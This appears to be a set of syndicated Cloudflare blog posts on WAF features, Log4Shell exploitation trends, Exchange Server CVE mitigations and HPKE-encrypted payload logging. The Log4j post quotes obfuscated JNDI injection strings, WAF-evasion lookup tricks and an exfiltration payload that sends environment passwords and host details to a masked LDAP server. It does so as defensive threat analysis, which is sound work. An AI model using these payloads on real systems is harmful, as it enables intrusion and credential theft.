Further, some important updates are coming for these features. Advanced rate limiting rules will be launched as part of Security Week, and every customer will also get a free set of managed rules to protect all traffic from high profile vulnerabilities. And finally, in the next few months, firewall rules will move to the Ruleset Engine, adding more powerful capabilities thanks to the new Ruleset API. Feeling excited?

How customers shaped the future of WAF

Almost 500 customers participated in this user research study that helped us learn about needs and context of use. We employed four research methods, all of which were conducted in an unmoderated manner; this meant people around the world could participate remotely at a time and place of their choosing.

  • Card sorting involved participants grouping navigational elements into categories that made sense to them.
  • Tree testing assessed how well or poorly a proposed navigational structure performed for our target audience.
  • Design evaluation involved a task-based approach to measure effectiveness and utility of design concepts.
  • Survey questions helped us dive deeper into results, as well as painting a picture of our participants.

Results of this four-pronged study informed changes to both WAF and Security that are detailed below.

The new WAF experience

The final result reveals the WAF as part of a broader Security category, which also includes Bots, DDoS, API Shield and Page Shield. This destination enables you to create your rules (a.k.a. firewall rules), deploy Cloudflare managed rules, set rate limit conditions, and includes handy tools to protect your web applications.

All customers across all plans will now see the WAF products organized as below:

A new WAF experience
  1. Firewall rules allow you to create custom, user-defined logic by blocking or allowing traffic that leverages all the components of the HTTP requests and dynamic fields computed by Cloudflare, such as Bot score.
  2. Rate limiting rules include the traditional IP-based product we launched back in 2018 and the newer Advanced Rate Limiting for ENT customers on the Advanced plan (coming soon).
  3. Managed rules allows customers to deploy sets of rules managed by the Cloudflare analyst team. These rulesets include a “Cloudflare Free Managed Ruleset” currently being rolled out for all plans including FREE, as well as Cloudflare Managed, OWASP implementation, and Exposed Credentials Check for all paying plans.
  4. Tools give access to IP Access Rules, Zone Lockdown and User Agent Blocking. Although still actively supported, these products cover specific use cases that can be covered using firewall rules. However, they remain a part of the WAF toolbox for convenience.

Redesigning the WAF experience

Gestalt design principles suggest that “elements which are close in proximity to each other are perceived to share similar functionality or traits.” This principle in addition to the input from our customers informed our design decisions.

After reviewing the responses of the study, we understood the importance of making it easy to find the security products in the Dashboard, and the need to make it clear how particular products were related to or worked together with each other.

Crucially, the page needed to:

  • Display each type of rule we support, i.e. firewall rules, rate limiting rules and managed rules
  • Show the usage amount of each type
  • Give the customer the ability to add a new rule and manage existing rules
  • Allow the customer to reprioritise rules using the existing drag and drop behavior
  • Be flexible enough to accommodate future additions and consolidations of WAF features

We iterated on multiple options, including predominantly vertical page layouts, table based page layouts, and even accordion based page layouts. Each of these options, however, would force us to replicate buttons of similar functionality on the page. With the risk of causing additional confusion, we abandoned these options in favor of a horizontal, tabbed page layout.

How can I get it?

As of today, we are launching this new design of WAF to everyone! In the meantime, we are updating documentation to walk you through how to maximize the power of Cloudflare WAF.

Looking forward

This is a starting point of our journey to make Cloudflare WAF not only powerful but also easy to adapt to your needs. We are evaluating approaches to empower your decision-making process when protecting your web applications. Among growing intel information and more rules creation possibilities, we want to shorten your path from a possible threat detection (such as by security overview) to setting up the right rule to mitigate such threat. Stay tuned!

Exploitation of Log4j CVE-2021-44228 before public disclosure and evolution of evasion and exfiltration

Post Syndicated from John Graham-Cumming original https://blog.cloudflare.com/exploitation-of-cve-2021-44228-before-public-disclosure-and-evolution-of-waf-evasion-patterns/

Exploitation of Log4j CVE-2021-44228 before public disclosure and evolution of evasion and exfiltration

In this blog post we will cover WAF evasion patterns and exfiltration attempts seen in the wild, trend data on attempted exploitation, and information on exploitation that we saw prior to the public disclosure of CVE-2021-44228.

In short, we saw limited testing of the vulnerability on December 1, eight days before public disclosure. We saw the first attempt to exploit the vulnerability just nine minutes after public disclosure showing just how fast attackers exploit newly found problems.

We also see mass attempts to evade WAFs that have tried to perform simple blocking, we see mass attempts to exfiltrate data including secret credentials and passwords.

WAF Evasion Patterns and Exfiltration Examples

Since the disclosure of CVE-2021-44228 (now commonly referred to as Log4Shell) we have seen attackers go from using simple attack strings to actively trying to evade blocking by WAFs. WAFs provide a useful tool for stopping external attackers and WAF evasion is commonly attempted to get past simplistic rules.

In the earliest stages of exploitation of the Log4j vulnerability attackers were using un-obfuscated strings typically starting with ${jndi:dns, ${jndi:rmi and ${jndi:ldap and simple rules to look for those patterns were effective.

Quickly after those strings were being blocked and attackers switched to using evasion techniques. They used, and are using, both standard evasion techniques (escaping or encoding of characters) and tailored evasion specific to the Log4j Lookups language.

Any capable WAF will be able to handle the standard techniques. Tricks like encoding ${ as %24%7B or \u0024\u007b are easily reversed before applying rules to check for the specific exploit being used.

However, the Log4j language has some rich functionality that enables obscuring the key strings that some WAFs look for. For example, the ${lower} lookup will lowercase a string. So, ${lower:H} would turn into h. Using lookups attackers are disguising critical strings like jndi helping to evade WAFs.

In the wild we are seeing use of ${date}, ${lower}, ${upper}, ${web}, ${main} and ${env} for evasion. Additionally, ${env}, ${sys} and ${main} (and other specialized lookups for Docker, Kubernetes and other systems) are being used to exfiltrate data from the target process’ environment (including critical secrets).

To better understand how this language is being used, here is a small Java program that takes a string on the command-line and logs it to the console via Log4j:

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class log4jTester{
    private static final Logger logger = LogManager.getLogger(log4jTester.class);
       
    public static void main(String[] args) {
	logger.error(args[0]);
    }
}

This simple program writes to the console. Here it is logging the single word hide.

$ java log4jTester.java 'hide'          
01:28:25.606 [main] ERROR log4jTester - hide

The Log4j language allows use of the ${} inside ${} thus attackers are able to combine multiple different keywords for evasion. For example, the following ${lower:${lower:h}}${lower:${upper:i}}${lower:D}e would be logged as the word hide. That makes it easy for an attacker to evade simplistic searching for ${jndi, for example, as the letters of jndi can be hidden in a similar manner.

$ java log4jTester.java '${lower:${lower:h}}${lower:${upper:i}}${lower:d}e'
01:30:42.015 [main] ERROR log4jTester - hide

The other major evasion technique makes use of the :- syntax. That syntax enables the attacker to set a default value for a lookup and if the value looked up is empty then the default value is output. So, for example, looking up a non-existent environment variable can be used to output letters of a word.

$ java log4jTester.java '${env:NOTEXIST:-h}i${env:NOTEXIST:-d}${env:NOTEXIST:-e}' 
01:35:34.280 [main] ERROR log4jTester - hide

Similar techniques are in use with ${web}, ${main}, etc. as well as strings like ${::-h} or ${::::::-h} which both turn into h. And, of course, combinations of these techniques are being put together to make more and more elaborate evasion attempts.

To get a sense for how evasion has taken off here’s a chart showing un-obfuscated ${jndi: appearing in WAF blocks (the orange line), the use of the ${lower} lookup (green line), use of URI encoding (blue line) and one particular evasion that’s become popular ${${::-j}${::-n}${::-d}${::-i}(red line).

Exploitation of Log4j CVE-2021-44228 before public disclosure and evolution of evasion and exfiltration

For the first couple of days evasion was relatively rare. Now, however, although naive strings like ${jndi: remain popular evasion has taken off and WAFs must block these improved attacks.

We wrote last week about the initial phases of exploitation that were mostly about reconnaissance. Since then attackers have moved on to data extraction.

We see the use of ${env} to extract environment variables, and ${sys} to get information about the system on which Log4j is running. One attack, blocked in the wild, attempted to exfiltrate a lot of data from various Log4j lookups:

${${env:FOO:-j}ndi:${lower:L}da${lower:P}://x.x.x.x:1389/FUZZ.HEADER.${docker:
imageName}.${sys:user.home}.${sys:user.name}.${sys:java.vm.version}.${k8s:cont
ainerName}.${spring:spring.application.name}.${env:HOSTNAME}.${env:HOST}.${ctx
:loginId}.${ctx:hostName}.${env:PASSWORD}.${env:MYSQL_PASSWORD}.${env:POSTGRES
_PASSWORD}.${main:0}.${main:1}.${main:2}.${main:3}}

There you can see the user, home directory, Docker image name, details of Kubernetes and Spring, passwords for the user and databases, hostnames and command-line arguments being exfiltrated.

Because of the sophistication of both evasion and exfiltration WAF vendors need to be looking at any occurrence of ${ and treating it as suspicious. For this reason, we are additionally offering to sanitize any logs we send our customer to convert ${ to x{.

The Cloudflare WAF team is continuously working to block attempted exploitation but it is still vital that customers patch their systems with up to date Log4j or apply mitigations. Since data that is logged does not necessarily come via the Internet systems need patching whether they are Internet-facing or not.

All paid customers have configurable WAF rules to help protect against CVE-2021-44228, and we have also deployed protection for our free customers.

Cloudflare quickly put in place WAF rules to help block these attacks. The following chart shows how those blocked attacks evolved.

Exploitation of Log4j CVE-2021-44228 before public disclosure and evolution of evasion and exfiltration

From December 10 to December 13 we saw the number of blocks per minute ramp up as follows.

Date Mean blocked requests per minute
2021-12-10 5,483
2021-12-11 18,606
2021-12-12 27,439
2021-12-13 24,642

In our initial blog post we noted that Canada (the green line below) was the top source country for attempted exploitation. As we predicted that did not continue and attacks are coming from all over the wild, either directly from servers or via proxies.

Exploitation of Log4j CVE-2021-44228 before public disclosure and evolution of evasion and exfiltration

Exploitation of CVE-2021-44228 prior to disclosure

CVE-2021-44228 was disclosed in a (now deleted) Tweet on 2021-12-09 14:25 UTC:

Exploitation of Log4j CVE-2021-44228 before public disclosure and evolution of evasion and exfiltration

However, our systems captured three instances of attempted exploitation or scanning on December 1, 2021 as follows. In each of these I have obfuscated IP addresses and domain names. These three injected ${jndi:ldap} lookups in the HTTP User-Agent header, the Referer header and in URI parameters.

2021-12-01 03:58:34
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 
    (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 ${jndi:ldap://rb3w24.example.com/x}
Referer: /${jndi:ldap://rb3w24.example.com/x}
Path: /$%7Bjndi:ldap://rb3w24.example.com/x%7D

2021-12-01 04:36:50
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 
    (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 ${jndi:ldap://y3s7xb.example.com/x}
Referer: /${jndi:ldap://y3s7xb.example.com/x}
Parameters: x=$%7Bjndi:ldap://y3s7xb.example.com/x%7D						

2021-12-01 04:20:30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 
    (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 ${jndi:ldap://vf9wws.example.com/x}
Referer: /${jndi:ldap://vf9wws.example.com/x}	
Parameters: x=$%7Bjndi:ldap://vf9wws.example.com/x%7D	

After those three attempts we saw no further activity until nine minutes after public disclosure when someone attempts to inject a ${jndi:ldap} string via a URI parameter on a gaming website.

2021-12-09 14:34:31
Parameters: redirectUrl=aaaaaaa$aadsdasad$${jndi:ldap://log4.cj.d.example.com/exp}

Conclusion

CVE-2021-44228 is being actively exploited by a large number of actors. WAFs are effective as a measure to help prevent attacks from the outside, but they are not foolproof and attackers are actively working on evasions. The potential for exfiltration of data and credentials is incredibly high and the long term risks of more devastating hacks and attacks is very real.

It is vital to mitigate and patch affected software that uses Log4j now and not wait.

Traffic Sequence: Which Product Runs First?

Post Syndicated from Sam Marsh original https://blog.cloudflare.com/traffic-sequence-which-product-runs-first/

Traffic Sequence: Which Product Runs First?

Traffic Sequence: Which Product Runs First?

“Which came first, the chicken or the egg?” It’s one of life’s great questions. There are hundreds of articles published which conclude with eggs predating chickens by millions of years. Unfortunately, Cloudflare users don’t have New Scientist on hand to answer similar questions.

Which runs first, Firewall Rules or Workers? Page Rules or Transform Rules? Whilst not as philosophically challenging, the answers to these questions are key to setting up your Cloudflare zone correctly. Answering them has become increasingly difficult as more and more functionality is added, thanks to our incredible rate of shipping products. What was once a relatively easy to understand traffic flow exploded in complexity with the introduction of products such as Workers, Load Balancing Rules and Transform Rules. And this big bang of product announcements is only accelerating each year.

To begin addressing this problem, we developed Traffic Sequence. Traffic Sequence is a simple dashboard illustration which shows a default, high-level overview of how Cloudflare products interact. Think of this as your atlas, rather than your black cab driver’s “Knowledge”. This helps you understand that London is in the south east of the UK, but not that it’s quicker to walk than use the London Underground between Leicester Square and Covent Garden.

Traffic Sequence: Which Product Runs First?

Traffic Sequence is now enabled for all zones by default, appearing on ten product pages within the dashboard. Traffic Sequence highlights in blue the product area you are currently configuring, showing where within the HTTP request lifecycle the specific product sits. This provides context and allows users to understand which products will see the impact of changes here, and which products will not.

Traffic Sequence is designed to make Cloudflare’s edge clearer to our customers, allowing users to understand how products fit together and understand how HTTP requests flow between each.

Dear Cloudflare, which runs first?

Understanding how traffic is routed through Cloudflare has been one of the most common questions from both Cloudflare staff and customers alike.

But why does it matter? Let’s go through a simple example.

Released in April 2021, “Transform Rules” lets users rewrite URLs of HTTP requests as they proxy through their zone — for example, rewriting /login.php to /super/secret/login-page.php, all invisible to the end user.

In this scenario, the administrator also has a Firewall Rule blocking requests to the URI Path /login.php when the visitor is coming from a country other than the United States. What they would see, however, is that visitors from these other countries are still reaching the /login.php page on their servers. Why is this?

This is because URL rewrites happen before Firewall Rules, meaning the Firewall Rules product won’t see a URI Path of /login.php. Instead it will see HTTP requests with the rewritten URI path of /super/secret/login-page.php. Thus, when Firewall Rules evaluates the customers rule it checks:

  1. Is this from a country that is not the USA? Yes
  2. AND – Is this request going to a URI Path of /login.php? No.

As both criteria are not evaluated as ‘true’,  the rule does not match and the traffic is allowed on its journey.

This is why it is so important to know how Cloudflare’s products interoperate to get the most out of your plan, and achieve your goals without having to dig through mountains of documentation.

In an alternate timeline, Traffic Sequence is used to highlight that Firewall Rules run after URL rewriting occurs, and therefore see’s the rewritten value in the URI Path. With this information the customer can then configure a Firewall Rule to look for the rewritten value in URI Path and accomplish their desired setup.

From napkin to working prototype

Traffic Sequence was originally borne out of a “back of the napkin” idea during the creation of Transform Rules and URL Normalization, in an attempt to show where these transformations were happening:

Traffic Sequence: Which Product Runs First?

The idea might have started from a need of our own, but it ended up addressing well known customer and internal problems: whenever we build a new product everyone wants to understand how it fits into the big picture. So we pushed the idea further, proposing it to other teams and soliciting feedback.

This project was a great example of how bringing the right level of fidelity of thinking to the table can be evolved into an opportunity to ship to learn. Something that was initially meant as an explainer diagram for one rule type has become an almost bespoke experience of the dashboard, as it is unique to each customer’s Cloudflare environment, displaying only the products available for use in that zone. We offer many options and routes to products, but we didn’t have a straightforward flow of information that customers can rely on, focusing only on what they have set up and have access to.

As part of the design process, we try to focus on asking lots of questions rather than just finding an answer. Some of the considerations we had were:

  • What if we show customers a product they aren’t using?
  • What if we show customers a product they aren’t entitled to on their plan level?
  • Why aren’t we showing “this product”?
  • Do we have this visualisation on by default?

After gaining internal momentum to flesh out this project, we decided to focus on three areas:

  1. Simplifying a complex ecosystem – what is a useful simplification?
  2. Value that this will add beyond this first application
  3. Opportunity to test out different navigation and mental models.

After all, this is not just a map of our system, but a new way of navigating it entirely.

Positive early internal feedback not only aligned with our goals, but allowed us to iterate on points that needed improvement. We knew that this could be a game-changer for promoting clarity, improving discoverability and saving time with navigation: going for one click instead of three for most items.

Traffic Sequence: Which Product Runs First?

A couple of iterations later, we were ready to put this in the hands of our users for early testing:


Thanks to our incredible community we had a high level of interest in the first week, providing insight into how this feature would be used in the real world, and answering the ultimate question of this experiment: “Does this solve the problem of understanding how Cloudflare handles HTTP requests?”  via our Traffic Sequence survey form:

  • “I didn’t know where my requests were going… until now.”
  • “It’s always been confusing which products/features affect which other products/features.”
  • “It’s really handy to be able to explain the ordering that these are happening in, and I like the deeplink into the relevant area.”

These were all a great reminder that what triggered this work was ingrained in real customer needs.

Other feedback was rapidly incorporated into the prototype; specifically splitting Transform Rules into two separate sections to highlight that URL rewrites and header modifications occur at different parts of the request flow. We also added features which our users deemed important for clarity, such as IP Access Rules.

Traffic Sequence for all

Thanks to the great feedback and participation of all testers, both internal and external, we are now in a position where we are comfortable to take the covers off and make Traffic Sequence available to all users.

Traffic Sequence: Which Product Runs First?

The visualisation can be hidden easily by clicking on the “hide” button, and the display automatically hides to preserve critical whitespace when needed:

Traffic Sequence: Which Product Runs First?

When new products are added, or updates to products occur which modify the traffic order, this diagram will be updated accordingly.

Evolving Traffic Sequence

We know this is a high level, generic overview of how Cloudflare products interact. There is a level of nuance underneath, and a number of products and features not shown in the Traffic Sequence illustration which play an important part in keeping users safe and secure.

In the future we have aspirations to build “the other side of the coin”. Traffic Sequence provides a simple to understand view of how the products work by default at a high level. We also want to create a detailed, almost traceroute-like feature which allows users to see exactly what happens to their traffic — which products it goes via and what happens within those products, and potentially a lot more. Stay tuned!

Try it now

This feature is now enabled by default on all customer zones, and is visible within the dashboard locations outlined above.

Please do try it out and let us know what you think via the Cloudflare Community

Enable secure access to applications with Cloudflare WAF and Azure Active Directory

Post Syndicated from Abhi Das original https://blog.cloudflare.com/cloudflare-waf-integration-azure-active-directory/

Enable secure access to applications with Cloudflare WAF and Azure Active Directory

Enable secure access to applications with Cloudflare WAF and Azure Active Directory

Cloudflare and Microsoft Azure Active Directory have partnered to provide an integration specifically for web applications using Azure Active Directory B2C. From today, customers using both services can follow the simple integration steps to protect B2C applications with Cloudflare’s Web Application Firewall (WAF) on any custom domain. Microsoft has detailed this integration as well.

Cloudflare Web Application Firewall

The Web Application Firewall (WAF) is a core component of the Cloudflare platform and is designed to keep any web application safe. It blocks more than 70 billion cyber threats per day. That is 810,000 threats blocked every second.

Enable secure access to applications with Cloudflare WAF and Azure Active Directory

The WAF is available through an intuitive dashboard or a Terraform integration, and it enables users to build powerful rules. Every request to the WAF is inspected against the rule engine and the threat intelligence built from protecting approximately 25 million internet properties. Suspicious requests can be blocked, challenged or logged as per the needs of the user, while legitimate requests are routed to the destination regardless of where the application lives (i.e., on-premise or in the cloud). Analytics and Cloudflare Logs enable users to view actionable metrics.

The Cloudflare WAF is an intelligent, integrated, and scalable solution to protect business-critical web applications from malicious attacks, with no changes to customers’ existing infrastructure.

Azure AD B2C

Azure AD B2C is a customer identity management service that enables custom control of how your customers sign up, sign in, and manage their profiles when using iOS, Android, .NET, single-page (SPA), and other applications and web experiences. It uses standards-based authentication protocols including OpenID Connect, OAuth 2.0, and SAML. You can customize the entire user experience with your brand so that it blends seamlessly with your web and mobile applications. It integrates with most modern applications and commercial off-the-shelf software, providing business-to-customer identity as a service. Customers of businesses of all sizes use their preferred social, enterprise, or local account identities to get single sign-on access to their applications and APIs. It takes care of the scaling and safety of the authentication platform, monitoring and automatically handling threats like denial-of-service, password spray, or brute force attacks.

Integrated solution

When setting up Azure AD B2C, many customers prefer to customize their authentication endpoint by hosting the solution under their own domain — for example, under store.example.com — rather than using a Microsoft owned domain. With the new partnership and integration, customers can now place the custom domain behind Cloudflare’s Web Application Firewall while also using Azure AD B2C, further protecting the identity service from sophisticated attacks.

This defense-in-depth approach allows customers to leverage both Cloudflare WAF capabilities along with Azure AD B2C native Identity Protection features to defend against cyberattacks.

Instructions on how to set up the integration are provided on the Azure website and all it requires is a Cloudflare account.

Enable secure access to applications with Cloudflare WAF and Azure Active Directory

Customer benefit

Azure customers need support for a strong set of security and performance tools once they implement Azure AD B2C in their environment. Integrating Cloudflare Web Application Firewall with Azure AD B2C can provide customers the ability to write custom security rules (including rate limiting rules), DDoS mitigation, and deploy advanced bot management features. The Cloudflare WAF works by proxying and inspecting traffic towards your application and analyzing the payloads to ensure only non-malicious content reaches your origin servers. By incorporating the Cloudflare integration into Azure AD B2C, customers can ensure that their application is protected against sophisticated attack vectors including zero-day vulnerabilities, malicious automated botnets, and other generic attacks such as those listed in the OWASP Top 10.

Conclusion

This integration is a great match for any B2C businesses that are looking to enable their customers to authenticate themselves in the easiest and most secure way possible.

Please give it a try and let us know how we can improve it. Reach out to us for other use cases for your applications on Azure. Register here for expressing your interest/feedback on Azure integration and for upcoming webinars on this topic.

Protecting against recently disclosed Microsoft Exchange Server vulnerabilities: CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065

Post Syndicated from Patrick R. Donahue original https://blog.cloudflare.com/protecting-against-microsoft-exchange-server-cves/

Protecting against recently disclosed Microsoft Exchange Server vulnerabilities: CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065

Enabling the Cloudflare WAF and Cloudflare Specials ruleset protects against exploitation of unpatched CVEs: CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065.

Cloudflare has deployed managed rules protecting customers against a series of remotely exploitable vulnerabilities that were recently found in Microsoft Exchange Server. Web Application Firewall customers with the Cloudflare Specials ruleset enabled are automatically protected against CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065.

If you are running Exchange Server 2013, 2016, or 2019, and do not have the Cloudflare Specials ruleset enabled, we strongly recommend that you do so. You should also follow Microsoft’s urgent recommendation to patch your on-premise systems immediately. These vulnerabilities are actively being exploited in the wild by attackers to exfiltrate email inbox content and move laterally within organizations’ IT systems.

Edge Mitigation

If you are running the Cloudflare WAF and have enabled the Cloudflare Specials ruleset, there is nothing else you need to do. We have taken the unusual step of immediately deploying these rules in “Block” mode given active attempted exploitation.

If you wish to disable the rules for any reason, e.g., you are experiencing a false positive mitigation, you can do so by following these instructions:

  1. Login to the Cloudflare Dashboard and click on the Cloudflare Firewall tab and then Managed Rules.
  2. Click on the “Advanced” link at the bottom of the Cloudflare Managed Ruleset card and search for rule ID 100179. Select any appropriate action or disable the rule.
  3. Repeat step #2 for rule ID 100181.

Server Side Mitigation

In addition to blocking attacks at the edge, we recommend that you follow Microsoft’s urgent recommendation to patch your on-premise systems immediately. For those that are unable to immediately patch their systems, Microsoft posted yesterday with interim mitigations that can be applied.

To determine whether your system is (still) exploitable, you can run an Nmap script posted by Microsoft to GitHub: https://github.com/microsoft/CSS-Exchange/blob/main/Security/http-vuln-cve2021-26855.nse.

Vulnerability Details

The attacks observed in the wild take advantage of multiple CVEs that can result in exfiltration of email inboxes and remote code execution when chained together. Security researchers at Volexity have published a detailed analysis of the zero-day vulnerabilities.

Briefly, attackers are:

  1. First exploiting a server-side request forgery (SSRF) vulnerability documented as CVE-2021-26855 to send arbitrary HTTP requests and authenticate as the Microsoft Exchange server.
  2. Using this SYSTEM-level authentication to send SOAP payloads that are insecurely deserialized by the Unified Messaging Service, as documented in CVE-2021-26857. An example of the malicious SOAP payload can be found in the Volexity post linked above.
  3. Additionally taking advantage of CVE-2021-26858 and CVE-2021-27065 to upload arbitrary files such as webshells that allow further exploitation of the system along with a base to move laterally to other systems and networks. These file writes require authentication but this can be bypassed using CVE-2021-26855.

All 4 of the CVEs listed above are blocked by the recently deployed Cloudflare Specials rules: 100179 and 100181. Additionally, existing rule ID 100173, also enabled to Block by default, partially mitigates the vulnerability by blocking the upload of certain scripts.

Additional Recommendations

Organizations can deploy additional protections against this type of attack by adopting a Zero Trust model and making the Exchange server available only to trusted connections. The CVE guidance recommends deploying a VPN or other solutions to block attempts to reach public endpoints. In addition to the edge mitigations from the Cloudflare WAF, your team can protect your Exchange server by using Cloudflare for Teams to block all unauthorized requests.

Using HPKE to Encrypt Request Payloads

Post Syndicated from Miguel de Moura original https://blog.cloudflare.com/using-hpke-to-encrypt-request-payloads/

Using HPKE to Encrypt Request Payloads

Using HPKE to Encrypt Request Payloads

The Managed Rules team was recently given the task of allowing Enterprise users to debug Firewall Rules by viewing the part of a request that matched the rule. This makes it easier to determine what specific attacks a rule is stopping or why a request was a false positive, and what possible refinements of a rule could improve it.

The fundamental problem, though, was how to securely store this debugging data as it may contain sensitive data such as personally identifiable information from submissions, cookies, and other parts of the request. We needed to store this data in such a way that only the user who is allowed to access it can do so. Even Cloudflare shouldn’t be able to see the data, following our philosophy that any personally identifiable information that passes through our network is a toxic asset.

This means we needed to encrypt the data in such a way that we can allow the user to decrypt it, but not Cloudflare. This means public key encryption.

Now we needed to decide on which encryption algorithm to use. We came up with some questions to help us evaluate which one to use:

  • What requirements do we have for the algorithm?
  • What language do we implement it in?
  • How do we make this as secure as possible for users?

Here’s how we made those decisions.

Algorithm Requirements

While we knew we needed to use public key encryption, we also needed to keep an eye on performance. This led us to select Hybrid Public Key Encryption (HPKE) early on as it has a best-of-both-worlds approach to using symmetric as well as public-key cryptography to increase performance. While these best-of-both-worlds schemes aren’t new [1][2][3], HPKE aims to provide a single, future-proof, robust, interoperable combination of a general key encapsulation mechanism and a symmetric encryption algorithm.

HPKE is an emerging standard developed by the Crypto Forum Research Group (CFRG), the research body that supports the development of Internet standards at the IETF. The CFRG produces specifications called RFCs (such as RFC 7748 for elliptic curves) that are then used in higher level protocols including two we talked about previously: ODoH and ECH. Cloudflare has long been a supporter of Internet standards, so HPKE was a natural choice to use for this feature. Additionally, HPKE was co-authored by one of our colleagues at Cloudflare.

How HPKE Works

HPKE combines an asymmetric algorithm such as elliptic curve Diffie-Hellman and a symmetric cipher such as AES. One of the upsides of HPKE is that the algorithms aren’t dictated to the implementer, but making a combination that’s provably secure and meets the developer’s intuitive notions of security is important. All too often developers reach for a scheme without carefully understanding what it does, resulting in security vulnerabilities.

HPKE solves these problems by providing a high level of security in a generic manner and providing necessary hooks to tie messages to the context in which they are generated. This is the application of decades of research into the correct security notions and schemes.

Using HPKE to Encrypt Request Payloads

HPKE is built in stages. First it turns a Diffie-Hellman key agreement into a Key Encapsulation Mechanism. A key encapsulation mechanism has two algorithms: Encap and Decap. The Encap algorithm creates a symmetric secret and wraps it in a public key, so that only the holder of the private key can unwrap it. An attacker with the encapsulation cannot recover the random key. Decap takes the encapsulation and the private key associated to the public key, and computes the same random key. This translation gives HPKE the flexibility to work almost unchanged with any kind of public key encryption or key agreement algorithm.

HPKE mixes this key with an optional info argument, as well as information relating to the cryptographic parameters used by each side. This ensures that attackers cannot modify messages’ meaning by taking them out of context. A postcard marked “So happy to see you again soon” is ominous from the dentist and endearing from one’s grandmother.

The specification for HPKE is open and available on the IETF website. It is on its way to becoming an RFC after passing multiple rounds of review and analysis by cryptography experts at the CFRG. HPKE is already gaining adoption in IETF protocols like ODoH, ECH, and the new Messaging Layer Security (MLS) protocol. HPKE is also designed with the post-quantum future since it is built to work with any KEM, including all the NIST finalists for post-quantum public-key encryption.

Implementation Language

Once we had an encryption scheme selected, we needed to settle on an implementation. HPKE is still fairly new, so the libraries aren’t quite mature yet. There is a reference implementation, and we’re in the process of developing an implementation in Go as part of CIRCL. However, in the absence of a clear “go to” that is widely known to be the best, we decided to go with an implementation leveraging the same language already powering much of the Firewall code running at the Cloudflare edge – Rust.

Aside from this, the language benefits from features like native primitives, and crucially the ability to easily compile to WebAssembly (WASM).

As we mentioned in a previous blog post, customers are able to generate a key pair and decrypt payloads either from the dashboard UI or from a CLI. Instead of writing and maintaining two different codebases for these, we opted to reuse the same implementation across the edge component that encrypts the payloads and the UI and CLI that decrypt them. To achieve this we compile our library to target WASM so it can be used in the dashboard UI code that runs in the browser. While this approach may yield a slightly larger JavaScript bundle size and relatively small computational overhead, we found it preferable to spending a significant amount of time securely re-implementing HPKE using JavaScript WebCrypto primitives.

The HPKE implementation we decided on comes with the caveat of not yet being formally audited, so we performed our own internal security review. We analyzed the cryptography primitives being used and the corresponding libraries. Between the composition of said primitives and secure programming practices like correctly zeroing memory and safe usage of random number generators, we found no security issues.

Making It Secure For Users

To encrypt on behalf of users, we need them to provide us with a public key. To make this as easy as possible, we built a CLI tool along with the ability to do it right in the browser. Either option allows the user to generate a public/private key pair without needing to talk to Cloudflare servers at all.

In our API, we specifically do not accept the private key of the key pair — we don’t want it! We don’t need and don’t want to be able to decrypt the data we’re storing.

For the dashboard, once the user provides the private key for decryption, the key is held in a temporary JavaScript variable and used for the in-browser decryption. This allows the user to not constantly have to provide the key while browsing the Firewall event logs. The private key is also not persisted in any way in the browser, so any action that refreshes the page such as refreshing or navigating away will require the user to provide the key again. We believe this is an acceptable usability compromise for better security.

How Payload Extraction Works

After deciding how to encrypt the data, we just had to figure out the rest of the feature: what data to encrypt, how to store and transmit it, and how to allow users to decrypt it.

When an HTTP request reaches the L7 Firewall, it is evaluated against a set of rulesets. Each of these rulesets contain several rules written in the wirefilter syntax.

An example of one such rule would be:

http.request.version eq "HTTP/1.1"
and
(
    http.request.uri.path matches "\n+."
    or
    http.request.uri.query matches "\x00+."
)

This expression evaluates to a boolean “true” for HTTP/1.1 requests that either contain one or more newlines followed by a character in the request path or one or more NULL bytes followed by a character in the query string.

Say we had the following request that would match the rule above:

GET /cms/%0Aadmin?action=%00post HTTP/1.1
Host: example.com

If matched data logging is enabled, the rules that match would be executed again in a special context that tags all fields that are accessed during execution. We do this second execution because this tagging adds a noticeable computational overhead, and since the vast majority of requests don’t trigger a rule at all we would be unnecessarily adding overhead to each request. Requests that do match any rules will only match a few rules as well, so we don’t need to re-execute a large portion of the ruleset.

You may notice that although http.request.uri.query matches "\x00+." evaluates to true for this request, it won’t be executed, because the expression short-circuits with the first or condition that also matches. This results in only http.request.version and http.request.uri.path being tagged as accessed:

http.request.version -> HTTP/1.1
http.request.uri.path -> /cms/%0Aadmin

Having gathered the fields that were accessed, the Firewall engine does some post-processing; removing fields that are a subset of others (e.g., the query string and the full URI), or truncating fields that are beyond a certain character length.

Finally, these get serialized as JSON, encrypted with the customer’s public key, serialized again as a set of bytes, and prefixed with a version number should we need to change/update it in the future. To simplify consumption of these blobs, our APIs display a base64 encoded version of the bytes:

Using HPKE to Encrypt Request Payloads

Now that we have encrypted the data at the edge and persisted it in ClickHouse, we need to allow users to decrypt it. As part of the setup of turning this feature on, users generated a key-pair: the public key which was used to encrypt the payloads and a private key which is used to decrypt them. Decryption is done completely offline via either the command line using cloudflare/matched-data-cli:

$ MATCHED_DATA=AkjQDktMX4FudxeQhwa0UPNezhkgLAUbkglNQ8XVCHYqPgAAAAAAAACox6cEwqWQpFVE2gCFyOFsSdm2hCoE0/oWKXZJGa5UPd5mWSRxNctuXNtU32hcYNR/azLjsGO668Jwk+qCdFvmKjEqEMJgI+fvhwLQmm4=
$ matched-data-cli decrypt -d $MATCHED_DATA -k $PRIVATE_KEY
{"http.request.version": "HTTP/1.1", "http.request.uri.path": "/cms/%0Aadmin"}

Or the dashboard UI:

Using HPKE to Encrypt Request Payloads

Since our CLI tool is open-source and HPKE is interoperable, it can also be used in other tooling as part of a user’s logging pipeline, for example in security information and event management (SIEM) software.

Conclusion

This was a team effort with help from our Research and Security teams throughout the process. We relied on them for recommendations on how best to evaluate the algorithms as well as vetting the libraries we wanted to use.

